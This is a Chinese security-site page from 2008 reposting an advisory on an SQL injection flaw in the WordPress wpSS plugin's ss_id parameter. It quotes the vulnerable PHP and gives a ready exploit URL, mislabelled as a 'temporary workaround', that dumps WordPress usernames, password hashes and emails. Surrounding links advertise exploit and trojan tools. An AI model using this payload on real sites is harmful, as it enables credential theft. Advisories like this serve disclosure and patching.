·	WordPress wpSS插件ss_i	05-04	·	Oblog漏洞五一重现	05-04
·	跨站脚本－攻击和防御指	05-04	·	两个shellcode	05-04
·	代理工具：CTProxy 1.0	05-04	·	强悍挂马工具：IIS_AD I	05-04
·	Windows XP with SP3 VO	05-04	·	易美网络提供1000M网络免	05-04
·	终点免费空间提供100M免	05-04	·	Vista中新增命令完整版	05-01
·	Windows系统中的“普通人	05-01	·	oxyhostsfree.com提供5G	05-01
·	实用技巧玩转Vista下备	04-29	·	V9站长天空提供200M高速	04-29
·	用WinHEX远程查杀顽固病	04-28	·	js下载者	04-28
·	又一个MS08-025溢出工具	04-28	·	MS08-025 for win2k & w	04-28
·	WEB暴力破解工具(wvs fu	04-28	·	最近比较流行的数据库挂	04-28
·	攻击木马–远程控制软件	04-28	·	仿SQLTOOLS 写的一个工具	04-28
·	输入小助手.vbs	04-28	·	logtamper-v1.0 修改lin	04-28
·	nasl插件生成器（带源码	04-28	·	OBlog 的SQL注入漏洞检测	04-28
·	经典Windows XP系统故障	04-28	·	全民红客 CNN攻击技术解	04-28

[注意]WordPress wpSS插件ss_id参数SQL注入漏洞

荐 ★★★★★

WordPress wpSS插件ss_id参数SQL注入漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-4 11:16:01

受影响系统：
WordPress wpSS <= 0.6 v
不受影响系统：
WordPress wpSS 0.62

描述：

--------------------------------------------------------------------------------
BUGTRAQ ID: 28894
wpSS是WordPress中所使用的电子表格插件，允许在WordPress博客中嵌入交互式的电子表格。
wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中：

ss_load.php
$id = $_GET[′ss_id′];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
if ($wpdb->query("CT * $table_name id=′$id′") == 0) {
....

这允许远程攻击者通过注入任意SQL代码操控SQL查询，导致执行任意代码。
<*来源：1ten0.0net1
链接：http://secunia.com/advisories/29938/
*>

建议：

--------------------------------------------------------------------------------

临时解决方法：

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4++wp_users--&display=plain

厂商补丁：
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://timrohrer.com/blog/?page_id=71

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章： OBlog 的SQL注入漏洞检测

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04